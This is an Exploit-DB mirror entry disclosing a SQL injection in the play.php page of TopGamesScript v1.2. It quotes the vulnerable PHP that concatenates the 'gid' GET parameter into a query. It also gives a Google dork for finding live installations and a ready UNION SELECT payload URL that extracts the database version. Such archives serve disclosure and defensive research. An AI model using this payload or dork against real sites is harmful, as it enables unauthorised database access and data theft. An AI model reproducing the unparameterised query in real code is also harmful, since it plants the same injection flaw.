bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/26405.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

47 lines
No EOL
1.5 KiB
Text
Raw Blame History

TopGamesScript-v1.2 (play.php) Sql Injection Vulnerability
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script :
http://sourceforge.net/projects/gamesscript/files/latest/download?source=directory
.:. Dork : inurl:"play.php?gid=" "Powered By TopGames.ws"
####################################################################
######################################
VULNERABILITY: CLASSIC MYSQL INJECTION
######################################
/play.php (LINE: 4-19)
-----------------------------------------------------------------------------
$gameID= $_GET['gid'];
$con = mysql_connect($dbserver,$dbuser,$dbpassword);
if (!$con)
{
die('Could not connect: ' . mysql_error());
}
mysql_select_db($dbname, $con);
$sqlselect="SELECT * FROM games WHERE gameid=" . $gameID;
$result = mysql_query($sqlselect);
$row = mysql_fetch_array($result);
$gwidth = $row['width'];
$gheight = $row['height'];
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
http://localhost/TopGamesScript/play.php?gid=null and 1=2 UNION SELECT
1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
####################################################################
Reference in a new issue View git blame Copy permalink